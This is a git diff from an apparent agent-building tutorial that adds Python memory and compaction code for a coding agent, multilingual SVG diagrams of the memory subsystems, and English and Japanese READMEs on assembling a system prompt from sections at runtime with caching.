tr = collect_tool_results(msgs) + if len(tr) <= KEEP_RECENT: return msgs + for _, _, b in tr[:-KEEP_RECENT]: + if len(b.get("content", "")) > 120: b["content"] = "[Earlier tool result compacted.]" + return msgs +def persist_large(tid, out): + if len(out) <= PERSIST_THRESHOLD: return out + TOOL_RESULTS_DIR.mkdir(parents=True, exist_ok=True) + p = 
TOOL_RESULTS_DIR / f"{tid}.txt" + if not p.exists(): p.write_text(out) + return f"\nFull: {p}\nPreview:\n{out[:2000]}\n" +def tool_result_budget(msgs, mx=200_000): + last = msgs[-1] if msgs else None + if not last or last.get("role") != "user" or not isinstance(last.get("content"), list): return msgs + blocks = [(i, b) for i, b in enumerate(last["content"]) if isinstance(b, dict) and b.get("type") == "tool_result"] + total = sum(len(str(b.get("content", ""))) for _, b in blocks) + if total <= mx: return msgs + for _, block in sorted(blocks, key=lambda p: len(str(p[1].get("content", ""))), reverse=True): + if total <= mx: break + c = str(block.get("content", "")) + if len(c) <= PERSIST_THRESHOLD: continue + block["content"] = persist_large(block.get("tool_use_id", "?"), c) + total = sum(len(str(b.get("content", ""))) for _, b in blocks) + return msgs +def write_transcript(msgs): + TRANSCRIPT_DIR.mkdir(parents=True, exist_ok=True) + p = TRANSCRIPT_DIR / f"transcript_{int(time.time())}.jsonl" + with p.open("w") as f: + for m in msgs: f.write(json.dumps(m, default=str) + "\n") + return p +def summarize_history(msgs): + conv = json.dumps(msgs, default=str)[:80000] + r = client.messages.create(model=MODEL, messages=[{"role": "user", "content": "Summarize:\n" + conv}], max_tokens=2000) + return r.content[0].text.strip() +def compact_history(msgs): + write_transcript(msgs); summary = summarize_history(msgs) + return [{"role": "user", "content": f"[Compacted]\n\n{summary}"}] +def reactive_compact(msgs): + write_transcript(msgs); summary = summarize_history(msgs) + return [{"role": "user", "content": f"[Reactive compact]\n\n{summary}"}, *msgs[-5:]] + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", "input_schema": {"type": "object", "properties": {"command": {"type": "string"}}, "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", "input_schema": {"type": "object", "properties": {"path": {"type": "string"}}, "required": 
["path"]}}, + {"name": "write_file", "description": "Write content.", "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "content": {"type": "string"}}, "required": ["path", "content"]}}, +] +TOOL_HANDLERS = {"bash": run_bash, "read_file": run_read, "write_file": run_write} + + +# ═══════════════════════════════════════════════════════════ +# agent_loop — s09 change: inject memories + extract after compact +# ═══════════════════════════════════════════════════════════ + +def agent_loop(messages: list): + round_count = 0 + while True: + # s09 change: inject relevant memories every turn + memories_text = load_memories(messages) + system = SYSTEM + "\n\n" + memories_text if memories_text else SYSTEM + + messages[:] = snip_compact(messages) + messages[:] = micro_compact(messages) + messages[:] = tool_result_budget(messages) + + if estimate_size(messages) > CONTEXT_LIMIT: + print("[auto compact]") + messages[:] = compact_history(messages) + # s09 change: extract memories after compact, consolidate periodically + extract_memories(messages) + consolidate_memories() + + try: + response = client.messages.create(model=MODEL, system=system, messages=messages, tools=TOOLS, max_tokens=8000) + except Exception as e: + if "prompt_too_long" in str(e).lower(): messages[:] = reactive_compact(messages); continue + raise + + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": return + + results = [] + for block in response.content: + if block.type != "tool_use": continue + print(f"\033[36m> {block.name}\033[0m") + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + print(str(output)[:200]) + results.append({"type": "tool_result", "tool_use_id": block.id, "content": output}) + messages.append({"role": "user", "content": results}) + round_count += 1 + + +if __name__ == "__main__": + print("s09: Memory") + print("输入问题,回车发送。输入 q 退出。\n") + 
history = [] + while True: + try: query = input("\033[36ms09 >> \033[0m") + except (EOFError, KeyboardInterrupt): break + if query.strip().lower() in ("q", "exit", ""): break + history.append({"role": "user", "content": query}) + agent_loop(history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": print(block.text) + print() diff --git a/s09_memory/images/memory-overview.en.svg b/s09_memory/images/memory-overview.en.svg new file mode 100644 index 000000000..04801d313 --- /dev/null +++ b/s09_memory/images/memory-overview.en.svg @@ -0,0 +1,104 @@ + + + + + + + + + + + + + + + + + + + + + + Memory — memory loading & extraction inserted on top of s08 compaction + + + + s08 preserved + + s09 new + + + + messages[] + + + + + + + Compaction Pipeline + snip → micro → budget + → autoCompact + (s08) + + + + + + + Loading + Filter relevant memories + Inject into context + ≤ 2000 token + + + + + + + LLM + + + + No + + Return result + + + + Yes + + + + TOOL_HANDLERS + bash · read · write + task · skill · ... 
+ + + + Memory Files (.memory/) — Cross-session persistence + + + + Read + + + + Extraction + Write + + + Consolidation: periodic dedup·merge·prune (background) + + + + Tool results appended to messages[] → next turn → compress → load memories → LLM + + + + + s08 preserved: compaction pipeline (L1-L4) + emergency trimming + loop + + s09 new: Loading (inject memories each turn) + Extraction (extract after compact) + Consolidation (periodic) + Three subsystems by trigger timing: each turn → after compact → periodic + diff --git a/s09_memory/images/memory-overview.ja.svg b/s09_memory/images/memory-overview.ja.svg new file mode 100644 index 000000000..9aa34b139 --- /dev/null +++ b/s09_memory/images/memory-overview.ja.svg @@ -0,0 +1,104 @@ + + + + + + + + + + + + + + + + + + + + + + Memory — s08 圧縮パイプラインにメモリの読み込みと抽出を挿入 + + + + s08 維持 + + s09 新規 + + + + messages[] + + + + + + + 圧縮パイプライン + snip → micro → budget + → autoCompact + (s08) + + + + + + + Loading + 関連メモリをフィルタ + コンテキストに注入 + ≤ 2000 token + + + + + + + LLM + + + + No + + 結果を返す + + + + Yes + + + + TOOL_HANDLERS + bash · read · write + task · skill · ... 
+ + + + メモリファイル (.memory/) — クロスセッション永続化 + + + + 読み取り + + + + Extraction + 書き込み + + + Consolidation: 定期的に重複排除・統合・整理(バックグラウンド) + + + + ツール結果を messages[] に追加 → 次のターン → 圧縮 → メモリ読み込み → LLM + + + + + s08 維持:圧縮パイプライン(L1-L4)+ 緊急トリミング + ループ + + s09 新規:Loading(各ターンでメモリ注入)+ Extraction(compact 後に抽出)+ Consolidation(定期的に統合) + 3つのサブシステム連携:各ターン → compact 後 → 定期的 + diff --git a/s09_memory/images/memory-overview.svg b/s09_memory/images/memory-overview.svg new file mode 100644 index 000000000..7c3f3134b --- /dev/null +++ b/s09_memory/images/memory-overview.svg @@ -0,0 +1,104 @@ + + + + + + + + + + + + + + + + + + + + + + Memory — 在 s08 压缩管线上,插入记忆加载与提取 + + + + s08 保留 + + s09 新增 + + + + messages[] + + + + + + + 压缩管线 + snip → micro → budget + → autoCompact + (s08) + + + + + + + Loading + 筛选相关记忆 + 注入上下文 + ≤ 2000 token + + + + + + + LLM + + + + + + 返回结果 + + + + + + + + TOOL_HANDLERS + bash · read · write + task · skill · ... + + + + Memory Files (.memory/) — 跨会话持久化 + + + + 读取 + + + + Extraction + 写入 + + + Consolidation: 定期去重·合并·淘汰(后台运行) + + + + 工具结果追加到 messages[] → 下一轮 → 压缩 → 加载记忆 → LLM + + + + + s08 保留:压缩管线(L1-L4)+ 应急裁剪 + 循环 + + s09 新增:Loading(每轮注入记忆)+ Extraction(compact 后提取)+ Consolidation(定期整理) + 三个子系统按触发时机:每轮 → compact 后 → 定期 + diff --git a/s09_memory/images/memory-subsystems.en.svg b/s09_memory/images/memory-subsystems.en.svg new file mode 100644 index 000000000..0f38f68b0 --- /dev/null +++ b/s09_memory/images/memory-subsystems.en.svg @@ -0,0 +1,69 @@ + + + + + + + + + + + + + + Memory System — Three Subsystems Working Together + + + + Loading + + Trigger: before each LLM call + Filter: keywords / embedding + Inject: system prompt tail + Only relevant, not all + + + + + + Extraction + + Trigger: after autoCompact + or keyword detected + LLM analyzes dialogue → JSON + Auto-discover preferences + + + + + + Consolidation + + Trigger: periodic / idle + Dedup · merge · prune + Keep ≤ 50 entries + "Dream" — like sleep memory consolidation + + + + Memory Files (.memory/mem_*.json) — 
Cross-session persistence + + + + Read + + + + Write + + + + Overwrite + + + + CC Source Code Comparison + • MemorySelector: embedding vector similarity filtering, not keyword matching + • ExtractMemories: triggered in stop hook, not after autoCompact + • DreamConsolidator: background thread, frequency by time + memory count + diff --git a/s09_memory/images/memory-subsystems.ja.svg b/s09_memory/images/memory-subsystems.ja.svg new file mode 100644 index 000000000..d560cdce4 --- /dev/null +++ b/s09_memory/images/memory-subsystems.ja.svg @@ -0,0 +1,69 @@ + + + + + + + + + + + + + + Memory System — 3つのサブシステム連携 + + + + Loading + + トリガー:各ターン LLM 呼び出し前 + フィルタ:キーワード / embedding + 注入:system prompt 末尾 + 関連するものだけ、全部ではない + + + + + + Extraction + + トリガー:autoCompact 後 + またはキーワード検出時 + LLM が対話を分析 → JSON + 好みを自動発見 + + + + + + Consolidation + + トリガー:定期 / アイドル時 + 重複排除 · 統合 · 整理 + ≤ 50 件を維持 + "Dream" — 睡眠中の記憶整理に例えて + + + + メモリファイル (.memory/mem_*.json) — クロスセッション永続化 + + + + 読み取り + + + + 書き込み + + + + 上書き + + + + CC ソースコード比較 + ・MemorySelector:embedding ベクトル類似度でフィルタ、キーワードマッチングではない + ・ExtractMemories:stop hook でトリガー、autoCompact 後ではない + ・DreamConsolidator:バックグラウンドスレッド、頻度は時間 + メモリ数で決定 + diff --git a/s09_memory/images/memory-subsystems.svg b/s09_memory/images/memory-subsystems.svg new file mode 100644 index 000000000..a05d0de5f --- /dev/null +++ b/s09_memory/images/memory-subsystems.svg @@ -0,0 +1,69 @@ + + + + + + + + + + + + + + Memory System — 三个子系统协作 + + + + Loading(加载) + + 触发:每轮 LLM 调用前 + 筛选:关键词 / embedding + 注入:system prompt 尾部 + 只带相关的,不带全部的 + + + + + + Extraction(提取) + + 触发:autoCompact 后 + 或检测到关键词 + LLM 分析对话 → JSON + 自动发现偏好、约束、决策 + + + + + + Consolidation(巩固) + + 触发:定期/空闲时 + 去重·合并·淘汰 + 保持 ≤50 条 + "Dream"(梦境)— 借喻睡眠时整理记忆 + + + + Memory Files (.memory/mem_*.json) — 跨会话持久化 + + + + 读取 + + + + 写入 + + + + 覆写 + + + + CC 源码对照 + • MemorySelector:embedding 向量相似度筛选,非关键词匹配 + • ExtractMemories:在 stop hook 中触发,非 autoCompact 后 + • DreamConsolidator:后台线程,运行频率由时间 + 记忆数量决定 + diff --git 
a/s10_system_prompt/README.en.md b/s10_system_prompt/README.en.md new file mode 100644 index 000000000..c971b10c2 --- /dev/null +++ b/s10_system_prompt/README.en.md @@ -0,0 +1,235 @@ +# s10: System Prompt — Assembled at Runtime, Never Hardcoded + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s08 → s09 → `s10` → [s11](../s11_error_recovery/) → s12 → ... → s19 + +> *"A prompt is assembled, not hard-coded"* — Sections + on-demand assembly. +> +> **Harness Layer**: Prompt — Assembled at Runtime, Never Hardcoded. + +--- + +## The Problem + +From s01 through s09, the system prompt was a single hard-coded string: + +```python +SYSTEM = f"You are a coding agent at {WORKDIR}. Use tools to solve tasks." +``` + +That sufficed for s01 — only bash, read, and write. But by s09, the agent has memory, compression, and skill loading. The prompt needs to describe more capabilities: + +```python +SYSTEM = ( + f"You are a coding agent at {WORKDIR}. " + "Use tools to solve tasks. Act, don't explain. " + "Before starting any multi-step task, use todo_write. " + "Skills are available via list_skills and load_skill. " + "Relevant memories are injected below when available. " + # ... every new capability adds another paragraph +) +``` + +Three problems: + +1. **Changing projects requires rewriting the entire prompt** — switching from Python to React, you don't know what to change and what to keep +2. **Modifying one part can affect the whole** — adding a tool description may conflict with earlier instructions +3. **Every request carries all content** — even when the current conversation doesn't use skill loading, that description wastes tokens + +**A prompt should be like Lego — different scenarios assemble different blocks, not a single slab of concrete.** + +--- + +## The Solution + +![System Prompt Overview](images/system-prompt-overview.en.svg) + +s09's loop, compression, and memory are all preserved. 
The only change: split the hard-coded `SYSTEM` into independent sections, assemble them at runtime based on context, and cache the result to avoid redundant assembly.
+
+Six sections, two loading strategies:
+
+| Section | Loading Strategy | Content |
+|---------|-----------------|---------|
+| identity | Always | Who you are, how to work |
+| tools | Always | Available tool list |
+| workspace | Always | Working directory, environment info |
+| planning | On-demand | Planning instructions for multi-step tasks |
+| skills | On-demand | Loaded when skills are available |
+| memory | On-demand | Injected when relevant memories exist |
+
+---
+
+## How It Works
+
+### PROMPT_SECTIONS: Section Definitions
+
+Split one long string into a dictionary, where each key is a theme:
+
+```python
+PROMPT_SECTIONS = {
+    "identity": "You are a coding agent. Act, don't explain.",
+    "tools": "Available tools: bash, read, write, edit, glob...",
+    "workspace": f"Working directory: {WORKDIR}",
+    "planning": "For multi-step tasks, use todo_write first.",
+    "skills": "Skills are on demand: list_skills → load_skill.",
+    "memory": "Relevant memories are injected below when available.",
+}
+```
+
+Each section is maintained independently — modifying `tools` doesn't affect `identity`; adding `memory` doesn't touch `planning`.
+
+### assemble_system_prompt: On-Demand Assembly
+
+With the dictionary in place, not every section is needed every time. If the current conversation has no multi-step task, loading `planning` just wastes tokens.
Use `context` to decide what to load: + +```python +def assemble_system_prompt(context: dict) -> str: + """Assemble system prompt based on current context.""" + sections = [] + + # Always loaded + sections.append(PROMPT_SECTIONS["identity"]) + sections.append(PROMPT_SECTIONS["tools"]) + sections.append(PROMPT_SECTIONS["workspace"]) + + # On-demand + if context.get("has_todos"): + sections.append(PROMPT_SECTIONS["planning"]) + if context.get("has_skills"): + sections.append(PROMPT_SECTIONS["skills"]) + if context.get("memories"): + sections.append(f"Relevant memories:\n{context['memories']}") + + return "\n\n".join(sections) +``` + +"Always loaded" sections are needed every turn — identity, tools, working directory. "On-demand" sections are only useful under specific conditions. + +Why not load everything? **Tokens cost money** (system prompt is billed every turn), and **less information keeps the LLM more focused** (irrelevant instructions are noise). + +### get_system_prompt: Cache to Avoid Redundant Assembly + +When the context hasn't changed (multiple LLM calls within the same conversation turn, same context), re-assembling is wasteful. Use a hash to detect changes — cache hit returns immediately: + +```python +_last_context_hash = None +_last_prompt = None + +def get_system_prompt(context: dict) -> str: + """Get system prompt with caching.""" + global _last_context_hash, _last_prompt + h = hash(frozenset(context.items())) + if h == _last_context_hash and _last_prompt: + return _last_prompt + _last_context_hash = h + _last_prompt = assemble_system_prompt(context) + return _last_prompt +``` + +Cache precondition: only re-assemble when `context` changes. CC also has prompt cache at the API level — static parts use global cache, dynamic parts use org cache — the tutorial uses a hash for simplicity. 
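A caveat worth knowing about the cache key above: Python's built-in `hash()` raises `TypeError` as soon as a context value is unhashable (say, a list of memories), and its result is randomized per process, so it can never be persisted. Below is a hedged alternative that builds a stable key from a JSON digest; the name `context_key` is ours for illustration, not part of CC or the tutorial code, and it assumes the context dict stays JSON-serializable.

```python
import hashlib
import json

def context_key(context: dict) -> str:
    # Serialize with sorted keys so logically equal contexts
    # produce byte-identical JSON, then digest that JSON.
    payload = json.dumps(context, sort_keys=True, ensure_ascii=False)
    return hashlib.sha256(payload.encode("utf-8")).hexdigest()

# Key order does not matter; any value change does.
a = context_key({"has_todos": False, "memories": ""})
b = context_key({"memories": "", "has_todos": False})
c = context_key({"has_todos": True, "memories": ""})
assert a == b and a != c
```

Unlike `hash()`, the digest also survives process restarts, so the same key could index an on-disk prompt cache.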
+ +### Putting It Together + +```python +def agent_loop(messages: list, context: dict): + system = get_system_prompt(context) + while True: + response = client.messages.create( + model=MODEL, system=system, messages=messages, + tools=TOOLS, max_tokens=8000) + # ... tool execution ... + context = update_context(context, messages) + system = get_system_prompt(context) +``` + +At the start of each loop iteration, fetch the system prompt once. If context changed, re-assemble; otherwise return cached result. + +--- + +## Changes from s09 + +| Component | Before (s09) | After (s10) | +|-----------|-------------|-------------| +| prompt | Hard-coded SYSTEM string | PROMPT_SECTIONS + assemble_system_prompt | +| cache | None | get_system_prompt (hash detection + cache) | +| new functions | — | assemble_system_prompt, get_system_prompt | +| tools | bash, read_file, write_file (3) | bash, read_file, write_file (3) — unchanged | +| loop | Uses fixed SYSTEM | Uses get_system_prompt(context) | + +--- + +## Try It + +```sh +cd learn-claude-code +python s10_system_prompt/code.py +``` + +What to observe: + +1. Which sections are loaded in the output (`[assembled] sections: ...` label) +2. During continuous conversation, whether the prompt re-assembles when context changes +3. On cache hits, whether `[cache hit]` is shown, skipping re-assembly + +--- + +## What's Next + +The system prompt is assembled, memory is in place, compression is in place. The agent seems capable of handling anything — until an LLM call fails. + +Network jitter, API rate limiting, truncated output, context overflow — these aren't bugs, they're the norm. The agent can't crash at the first error. + +s11 Error Recovery → Four recovery paths. Upgrade tokens, compress context, exponential backoff, switch models. An error isn't the end — it's the start of a retry. + +
+Deep Dive into CC Source
+
+> The following is a complete analysis based on CC source code `prompts.ts` (914 lines), `systemPromptSections.ts` (68 lines), `context.ts` (189 lines).
+
+### 1. Not a Few Paragraphs — 21 Sections
+
+The tutorial uses a simple dictionary for prompt fragments. CC's system prompt consists of 21 sections, split into static and dynamic layers:
+
+**Static (cacheable across organizations)**: identity, system, doing_tasks, actions, using_tools, tone_style, output_efficiency — these are always loaded.
+
+**Dynamic (resolved through registry)**: session_guidance, memory, env_info, language, output_style, mcp_instructions, scratchpad, frc, summarize_tool_results, token_budget — these are loaded per cache policy.
+
+`mcp_instructions` is the only **volatile** section (`cacheBreak: true`) — because MCP servers can connect and disconnect between turns.
+
+### 2. Assembly Function Signature
+
+```typescript
+getSystemPrompt(tools, model, additionalWorkingDirs?, mcpClients?): Promise<string[]>
+```
+
+Returns `Promise<string[]>` (each element is a section), separated by `SYSTEM_PROMPT_DYNAMIC_BOUNDARY` between static and dynamic parts. This separator also determines the Anthropic API's `cache_scope` — before boundary: `global`, after boundary: `org`.
+
+### 3. Three-Layer Cache
+
+1. **lodash memoize**: `getSystemContext` and `getUserContext` cached for the entire session (`context.ts:36,116,155`)
+2. **Registry cache**: `STATE.systemPromptSectionCache` (`bootstrap/state.ts:203`) caches dynamic section results. Cleared on `/clear` or `/compact`
+3. **API-level cache**: `splitSysPromptPrefix()` (`api.ts:321`) splits the prompt into chunks with different `cache_scope` — static parts use global cache, dynamic parts use org cache
+
+### 4. 
getUserContext vs getSystemContext + +| | getSystemContext | getUserContext | +|---|---|---| +| Content | gitStatus, cacheBreaker | CLAUDE.md contents, currentDate | +| Injection | **Appended** to system prompt array | **Prepended** as `` user message | +| When skipped | Custom system prompt | Always runs | + +### 5. How Modes Change the Prompt + +- **CLAUDE_CODE_SIMPLE**: Entire prompt is just 2 lines +- **Proactive/KAIROS**: Replaces all standard sections with a compact prompt +- **Coordinator**: Fully replaced with coordinator-specific prompt +- **Agent mode**: Agent-defined prompt replaces or appends to the default prompt + +### 6. Total Size + +Standard interactive mode system prompt is approximately 20-30KB of text. CLAUDE_CODE_SIMPLE is about 150 characters. User context (CLAUDE.md) and system context (git status) are added on top. + +
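To make the boundary mechanics in sections 2-3 above concrete, here is a small Python sketch of the same idea. It is illustrative only: `BOUNDARY`, the section names, and the scope labels stand in for CC's TypeScript internals, and the real `splitSysPromptPrefix()` operates on prompt text rather than a Python list.

```python
# Illustrative mirror of SYSTEM_PROMPT_DYNAMIC_BOUNDARY, not CC's actual code.
BOUNDARY = "<<DYNAMIC_BOUNDARY>>"

def split_cache_scopes(sections: list[str]):
    """Sections before the boundary get the wider 'global' cache scope;
    sections after it get the narrower 'org' scope."""
    idx = sections.index(BOUNDARY)
    static = [(s, "global") for s in sections[:idx]]
    dynamic = [(s, "org") for s in sections[idx + 1:]]
    return static, dynamic

sections = ["identity", "using_tools", BOUNDARY, "env_info", "mcp_instructions"]
static, dynamic = split_cache_scopes(sections)
# static  -> [("identity", "global"), ("using_tools", "global")]
# dynamic -> [("env_info", "org"), ("mcp_instructions", "org")]
```

The payoff of the split is that the static prefix stays byte-identical across turns, which is exactly what makes the wider cache scope safe.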
+ + diff --git a/s10_system_prompt/README.ja.md b/s10_system_prompt/README.ja.md new file mode 100644 index 000000000..1d17d7b7d --- /dev/null +++ b/s10_system_prompt/README.ja.md @@ -0,0 +1,235 @@ +# s10: System Prompt — 実行時アセンブリ、ハードコードなし
+
+[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md)
+
+s01 → ... → s08 → s09 → `s10` → [s11](../s11_error_recovery/) → s12 → ... → s19
+
+> *"prompt は組み立てるもの、ハードコードするものではない"* — セクション分割 + オンデマンド結合。
+>
+> **Harness 層**: プロンプト — 実行時アセンブリ、ハードコードなし。
+
+---
+
+## 課題
+
+s01 から s09 まで、system prompt は常に 1 行のハードコードでした:
+
+```python
+SYSTEM = f"You are a coding agent at {WORKDIR}. Use tools to solve tasks."
+```
+
+s01 では十分でした — bash、read、write の 3 ツールのみ。しかし s09 では、Agent は記憶、圧縮、スキルロードを持っています。プロンプトが言及すべき機能が増え続けます:
+
+```python
+SYSTEM = (
+    f"You are a coding agent at {WORKDIR}. "
+    "Use tools to solve tasks. Act, don't explain. "
+    "Before starting any multi-step task, use todo_write. "
+    "Skills are available via list_skills and load_skill. "
+    "Relevant memories are injected below when available. "
+    # ... 機能追加のたびに段落が増える
+)
+```
+
+3 つの問題:
+
+1. **プロジェクト変更でプロンプト全体を書き直し** — Python から React への切り替え時、どこを変えるべきか不明
+2. **一箇所の修正が全体に影響** — ツール説明を追加すると、前の指示と競合する可能性
+3. **毎リクエストで全内容を送信** — スキルロードを使わない会話でも、その説明がトークンを無駄に消費
+
+**プロンプトはレゴブロックのように — 異なるシーンで異なるブロックを組み立てる、一枚岩のセメントではなく。**
+
+---
+
+## ソリューション
+
+![System Prompt Overview](images/system-prompt-overview.ja.svg)
+
+s09 のループ、圧縮、記憶はすべて保持。唯一の変更:ハードコードの `SYSTEM` を独立したセクションに分割し、実行時にコンテキストに応じて組み立て、キャッシュで再組み立てを回避。
+
+6 つのセクション、2 つのロード戦略:
+
+| セクション | ロード戦略 | 内容 |
+|-----------|-----------|------|
+| identity | 常時 | あなたは誰か、どう動くか |
+| tools | 常時 | 利用可能ツール一覧 |
+| workspace | 常時 | 作業ディレクトリ、環境情報 |
+| planning | オンデマンド | マルチステップタスク時の計画指示 |
+| skills | オンデマンド | 利用可能スキルがある時にロード |
+| memory | オンデマンド | 関連記憶がある時に注入 |
+
+---
+
+## 仕組み
+
+### PROMPT_SECTIONS: セクション定義
+
+長い文字列をディクショナリに分割。各 key が 1 つのテーマ:
+
+```python
+PROMPT_SECTIONS = {
+    "identity": "You are a coding agent. 
Act, don't explain.", + "tools": "Available tools: bash, read, write, edit, glob...", + "workspace": f"Working directory: {WORKDIR}", + "planning": "For multi-step tasks, use todo_write first.", + "skills": "Skills are on demand: list_skills → load_skill.", + "memory": "Relevant memories are injected below when available.", +} +``` + +各セクションは独立して保守 — `tools` を変更しても `identity` に影響なし、`memory` を追加しても `planning` に触れない。 + +### assemble_system_prompt: オンデマンド組み立て + +ディクショナリは用意できましたが、毎回すべてのセクションが必要なわけではありません。現在の会話にマルチステップタスクがなければ、`planning` をロードしてもトークンの無駄。`context` に基づいて何をロードするか決定: + +```python +def assemble_system_prompt(context: dict) -> str: + """現在のコンテキストに基づいて system prompt を組み立てる。""" + sections = [] + + # 常時ロード + sections.append(PROMPT_SECTIONS["identity"]) + sections.append(PROMPT_SECTIONS["tools"]) + sections.append(PROMPT_SECTIONS["workspace"]) + + # オンデマンド + if context.get("has_todos"): + sections.append(PROMPT_SECTIONS["planning"]) + if context.get("has_skills"): + sections.append(PROMPT_SECTIONS["skills"]) + if context.get("memories"): + sections.append(f"Relevant memories:\n{context['memories']}") + + return "\n\n".join(sections) +``` + +「常時ロード」は毎ターン必要 — アイデンティティ、ツール、作業ディレクトリ。「オンデマンド」は特定条件下でのみ有用。 + +なぜ全部ロードしない?**トークンにはコストがある**(system prompt は毎ターン課金)、そして**情報が少ないほど LLM は集中する**(無関係な指示はノイズ)。 + +### get_system_prompt: キャッシュで再組み立てを回避 + +コンテキストが変わっていない時(同一ターン内の複数 LLM 呼び出し、context が同一)、再度組み立てるのは無駄。hash で変化を検出 — キャッシュヒットなら即座に返却: + +```python +_last_context_hash = None +_last_prompt = None + +def get_system_prompt(context: dict) -> str: + """キャッシュ付き system prompt 取得。""" + global _last_context_hash, _last_prompt + h = hash(frozenset(context.items())) + if h == _last_context_hash and _last_prompt: + return _last_prompt + _last_context_hash = h + _last_prompt = assemble_system_prompt(context) + return _last_prompt +``` + +キャッシュの前提:`context` が変化した時のみ再組み立て。CC は API 層にもプロンプトキャッシュを持っています — 静的部分は global cache、動的部分は org cache — チュートリアル版は hash で簡略化。 + +### 組み合わせて実行 + +```python 
+def agent_loop(messages: list, context: dict): + system = get_system_prompt(context) + while True: + response = client.messages.create( + model=MODEL, system=system, messages=messages, + tools=TOOLS, max_tokens=8000) + # ... ツール実行 ... + context = update_context(context, messages) + system = get_system_prompt(context) +``` + +各ループ冒頭で system prompt を 1 回取得。context が変わっていれば再組み立て、変わっていなければキャッシュを返却。 + +--- + +## s09 からの変更 + +| コンポーネント | 変更前 (s09) | 変更後 (s10) | +|--------------|------------|------------| +| プロンプト | ハードコード SYSTEM 文字列 | PROMPT_SECTIONS + assemble_system_prompt | +| キャッシュ | なし | get_system_prompt(hash 検出 + キャッシュ) | +| 新規関数 | — | assemble_system_prompt, get_system_prompt | +| ツール | bash, read_file, write_file (3) | bash, read_file, write_file (3) — 変更なし | +| ループ | 固定 SYSTEM を使用 | get_system_prompt(context) を使用 | + +--- + +## 試してみる + +```sh +cd learn-claude-code +python s10_system_prompt/code.py +``` + +観察ポイント: + +1. 出力でロードされたセクションを確認(`[assembled] sections: ...` ラベル) +2. 継続会話で、context 変化後にプロンプトが再組み立てされるか +3. キャッシュヒット時に `[cache hit]` が表示され、再組み立てがスキップされるか + +--- + +## 次の章 + +system prompt の組み立て、記憶、圧縮 — すべて揃いました。Agent は何でも処理できそうに見えます — しかし LLM 呼び出しが失敗するまでは。 + +ネットワーク揺らぎ、API レート制限、出力の切り詰め、コンテキスト超過 — これらはバグではなく日常。Agent は最初のエラーでクラッシュしてはいけません。 + +s11 Error Recovery → 4 つのリカバリパス。トークンアップグレード、コンテキスト圧縮、指数バックオフ、モデル切り替え。エラーは終わりではなく、リトライの始まり。 + +
+CC ソースコード深掘り
+
+> 以下は CC ソースコード `prompts.ts`(914 行)、`systemPromptSections.ts`(68 行)、`context.ts`(189 行)の完全分析に基づきます。
+
+### 一、数段落ではなく、21 のセクション
+
+チュートリアル版は単純なディクショナリでプロンプト断片を格納。CC の system prompt は 21 のセクションで構成され、静的・動的の 2 層に分かれます:
+
+**静的(組織横断でキャッシュ可能)**:identity、system、doing_tasks、actions、using_tools、tone_style、output_efficiency — 常にロード。
+
+**動的(レジストリ経由で解決)**:session_guidance、memory、env_info、language、output_style、mcp_instructions、scratchpad、frc、summarize_tool_results、token_budget — キャッシュポリシーに従いロード。
+
+`mcp_instructions` は唯一の**揮発性**セクション(`cacheBreak: true`)— MCP サーバーはターン間で接続・切断可能なため。
+
+### 二、アセンブリ関数シグネチャ
+
+```typescript
+getSystemPrompt(tools, model, additionalWorkingDirs?, mcpClients?): Promise<string[]>
+```
+
+`Promise<string[]>`(各要素が 1 セクション)を返却。`SYSTEM_PROMPT_DYNAMIC_BOUNDARY` で静的・動的部分を区切り。この区切り文字は Anthropic API の `cache_scope` の決定にも使用 — 境界前は `global`、境界後は `org`。
+
+### 三、3 層キャッシュ
+
+1. **lodash memoize**:`getSystemContext` と `getUserContext` はセッション全体でキャッシュ(`context.ts:36,116,155`)
+2. **レジストリキャッシュ**:`STATE.systemPromptSectionCache`(`bootstrap/state.ts:203`)が動的セクションの結果をキャッシュ。`/clear` または `/compact` 時にクリア
+3. **API レベルキャッシュ**:`splitSysPromptPrefix()`(`api.ts:321`)がプロンプトを異なる `cache_scope` のチャンクに分割 — 静的部分は global cache、動的部分は org cache
+
+### 四、getUserContext vs getSystemContext
+
+| | getSystemContext | getUserContext |
+|---|---|---|
+| 内容 | gitStatus、cacheBreaker | CLAUDE.md 内容、currentDate |
+| 注入方式 | system prompt 配列に**追加** | `` ユーザーメッセージとして**前置** |
+| スキップ条件 | カスタム system prompt 使用時 | 常時実行 |
+
+### 五、モードによるプロンプトの変化
+
+- **CLAUDE_CODE_SIMPLE**:プロンプト全体がわずか 2 行
+- **Proactive/KAIROS**:全標準セクションをコンパクト版プロンプトに置換
+- **Coordinator**:コーディネータ専用プロンプトに完全置換
+- **Agent モード**:Agent 定義プロンプトがデフォルトプロンプトを置換または追加
+
+### 六、合計サイズ
+
+標準インタラクティブモードの system prompt コアは約 20-30KB のテキスト。CLAUDE_CODE_SIMPLE は約 150 文字。ユーザーコンテキスト(CLAUDE.md)とシステムコンテキスト(git status)がその上に累積。
+
+
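上記「三、3 層キャッシュ」のレジストリキャッシュ(`/clear`・`/compact` でクリア)の挙動を、Python の仮スケッチで示します。クラス名・メソッド名はすべて説明用の仮定であり、CC の実装そのものではありません。

```python
# 説明用の仮スケッチ。CC の STATE.systemPromptSectionCache を模したものではあるが、
# 名前・構造はこのチュートリアル側の仮定。
class SectionCache:
    def __init__(self):
        self._cache = {}
        self.misses = 0  # 再計算が発生した回数(観察用)

    def resolve(self, name, compute):
        # 動的 section を 1 度だけ計算し、以後はキャッシュを返す
        if name not in self._cache:
            self.misses += 1
            self._cache[name] = compute()
        return self._cache[name]

    def clear(self):
        # /clear や /compact 相当の操作でキャッシュを破棄
        self._cache.clear()

cache = SectionCache()
cache.resolve("env_info", lambda: "cwd=/repo")
cache.resolve("env_info", lambda: "cwd=/repo")  # ヒット(misses は増えない)
cache.clear()
cache.resolve("env_info", lambda: "cwd=/repo")  # clear 後は再計算
```

2 回目以降の `resolve` がキャッシュを返し、`clear()` 後に初めて再計算される点が要点です。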
